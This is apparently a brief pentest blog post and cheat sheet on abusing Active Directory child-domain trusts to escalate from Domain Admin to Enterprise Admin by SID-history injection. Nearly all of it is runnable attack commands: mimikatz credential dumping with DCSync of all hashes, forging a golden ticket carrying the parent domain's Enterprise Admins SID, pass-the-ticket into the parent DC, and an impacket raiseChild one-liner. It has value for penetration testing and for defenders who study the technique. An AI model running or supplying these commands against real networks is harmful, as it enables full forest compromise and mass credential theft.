Child Domain Trusts - Escalate Domain Admin to Enterprise Admin (SID Hijacking)
Posted 
Abusing Child Domain Trusts
By
1 min read
Enumeration:
1
get-adtrust -filter *
Manual Exploitation (Local)
To execute all of this, we need execute through RDP!
1. Run mimikatz.exe from DC02
Gather the informations.
1
2
3
privilege::debug
lsadump::trust
lsadump::dcsync /all /csv
Create a Golden Ticket.
1
kerberos::golden /user:Administrator /domain:<CHILD.DOMAIN.LOCAL> /sid:<CHILD_DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /sids:<PARENT_DOMAIN_SID>-519
- Add
-519on the last of/sids:to<PARENT_DOMAIN_SID>-519
Pass the Ticket.
1
kerberos::ptt ticket.kirbi
2. Enter PowerShell Session to DC01
After we are passing the ticket, we can enter powershell session from DC02 to DC01.
1
Enter-PSSession DC01
Auto Exploitation (Remote)
1
impacket-raiseChild -target-exec <DOMAIN.LOCAL> -hashes :<DC02_ADMINISTRATOR_HASHES> '<CHILD.DOMAIN.LOCAL>/Administrator' -k
This post is licensed under CC BY 4.0 by the author.